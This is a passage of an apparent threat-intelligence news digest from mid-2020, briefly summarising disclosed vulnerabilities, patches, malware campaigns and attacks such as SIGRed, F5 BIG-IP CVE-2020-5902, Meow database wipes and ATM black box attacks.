The bug is a classic "evil cursor" attack and works because modern browsers allow site owners to change how the mouse cursor looks while users are on their websites. Evil cursor attacks are typically weaponized by operators of tech support scam sites, who use the trick to keep users trapped on the page: the drawn cursor and the actual click point no longer match, so victims cannot close tabs and popups.

Vulnerability in Temi healthcare robots lets hackers remotely hijack enterprises

Robotemi Global's Temi is a "personal robot" that uses a range of sensors, artificial intelligence (AI) and machine learning (ML) technologies, as well as voice activation and mobile connectivity, to perform functions including personal assistance tasks, answering Internet queries and facilitating remote video calls. In total, four vulnerabilities were found: the use of hard-coded credentials, an origin validation error, missing authentication for a critical function and an authentication bypass.

Blueliv Intelligence Briefing

Tuesday,   August 4th,   2020

WordPress Newsletter plugin vulnerabilities affecting over 300k sites patched

At least 150,000 WordPress sites with active Newsletter installations are still potentially exposed if attackers start exploiting these bugs in future campaigns. Newsletter users are urged to update the plugin to version 6.8.3 as soon as possible to block attacks designed to add rogue admins or inject backdoors into their sites, given that threat actors frequently exploit already-fixed WordPress plugin vulnerabilities.

Blueliv Intelligence Briefing

Thursday,   July 23rd,   2020

IBM vulnerability in IVG patched

CVE-2020-4400, which has been assigned a CVSS severity score of 7.5, is caused by an account lockout mechanism deemed "inadequate" because it does not prevent multiple access attempts. In automated brute-force attacks, threat actors hammer a system with usernames and passwords until they come across the right combination; to stop these attacks from succeeding, software often includes login attempt restrictions. Learn more >

Signed PDF documents can be modified by a “Shadow Attack”

Fifteen out of 28 desktop PDF viewer applications are vulnerable to a new attack that lets malicious threat actors modify the content of digitally signed PDF documents. The main idea behind a Shadow Attack is the concept of "view layers" - different sets of content that are overlaid on top of each other inside a PDF document. Learn more >

Prometei cryptojacking botnet exploits Windows SMB

In total, the botnet has over 15 executable modules that are controlled by one main module. The botnet is organized into two main function branches: one C++ branch dedicated to cryptocurrency mining operations, and one .NET-based branch that focuses on credential theft, the abuse of SMB, and obfuscation. Learn more >

Blueliv Intelligence Briefing

Wednesday, July 22nd, 2020

Dozens of unsecured databases wiped in a “Meow” attack

The most recent publicly known example of a Meow attack is an Elasticsearch database belonging to a VPN provider that claimed not to keep any logs. The discoverer explained the database was initially secured in July only to become exposed again five days later. Learn more >

Adobe critical vulnerabilities in Photoshop, Bridge and Prelude fixed

For users running under a standard Windows user account rather than an administrative account, the impact of these vulnerabilities is greatly reduced unless they are chained with another vulnerability that elevates privileges. Adobe advises users to update the vulnerable apps to the latest versions to block attacks attempting to exploit unpatched installations. Learn more >

Citrix vulnerability that allows remote hacking fixed

“By sending a crafted message over a named pipe and spoofing the client process ID, the Citrix Workspace Updater Service can be tricked into executing an arbitrary process under the SYSTEM account,” researchers explain. “Whilst a low privilege account is required to perform the attack, environments that do not implement SMB signing are particularly vulnerable since an attack can be achieved without knowing valid credentials through NTLM credential relaying.” Learn more >

Blueliv Intelligence Briefing

Tuesday, July 21st, 2020

Welcome Chat, a malicious app bundled with spyware

The website of the application claims that it is a secure chat platform available on the Google Play store, neither of which is true. In addition to monitoring the users' chat history, the malicious app also exfiltrates SMS and call history logs, the contact list, GPS location, user photos, recorded calls and device information. There is evidence to believe that the app is not a 'trojanized app' but was developed with malicious intent from the start. Learn more >

F5 BIG-IP Networking Products still Unpatched

The vulnerability CVE-2020-5902 allows remote execution of arbitrary system commands on vulnerable BIG-IP devices whose management port is exposed and accessible via the Traffic Management User Interface (TMUI). Upon exploitation, this vulnerability could provide complete control of the host machine, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and use of the device as a hop point into other areas of the network. Learn more >

Windows 10 boot bug fixed

To prevent this issue, Microsoft is using an automated troubleshooter — instead of applying an update block — to prevent Disk Cleanup from launching on its own and causing boot issues until the users install the Windows version 19041.84 update which comes with a fix for this bug. "This troubleshooter automatically runs twice. It runs for the first time on all devices on Windows version 19041.21," Microsoft says. "It then runs again after devices are upgraded to Windows version 19041.84. This troubleshooter cannot be run manually." Learn more >

SIGred Windows DNS bug gets micropatch

SIGRed stems from a flaw in how Microsoft implemented the DNS server role and affects all Windows DNS server versions since 2003. Experts say that the official patch added three integer overflow/underflow checks, “for one subtraction and two addition operations.” The micropatch is similar but additionally logs and flags an exploit attempt when it detects the overflow/underflow. Learn more >

Blueliv Intelligence Briefing

Friday, July 17th, 2020

New ATM “black box” attacks across Europe

A black box attack is when an intruder unfastens an ATM outer case to access its ports or cuts a hole in the casing for direct access to its internal wiring or other hidden connectors. Using these access points, the attacker then connects a "black box" device -- usually a laptop or Raspberry Pi board -- to the ATM's internal components, which they use to send commands to the ATM's cash dispenser and release cash from the storage cassettes. Learn more >

Google exposes a bug that shows security alerts for TiVo devices

For the past two weeks, TiVo Stream 4K owners say that as soon as they link their account on the device, Google sends an alert to their inboxes warning that the device has extensive access to their personal data and that Google has not verified the device/app developer. In addition, the message also urges users to unlink their account from the device, advice that some users have followed. Learn more >

Russian hackers target COVID-19 research centers with malware

APT29 uses a variety of tools and techniques, including spear-phishing and custom malware known as “WellMess” and “WellMail”, according to some experts, who have also assessed that the hacking group “almost certainly operate[s] as part of Russian Intelligence Services.” Learn more >

Blueliv Intelligence Briefing

Wednesday, July 15th, 2020

Adobe’s Creative Cloud vulnerabilities fixed

These important-severity vulnerabilities were found in Adobe ColdFusion and Adobe Genuine Service, and they affect both Windows and macOS devices running unpatched software versions. Adobe advises users to update the vulnerable apps to the latest versions to block attacks attempting to exploit unpatched installations. Learn more >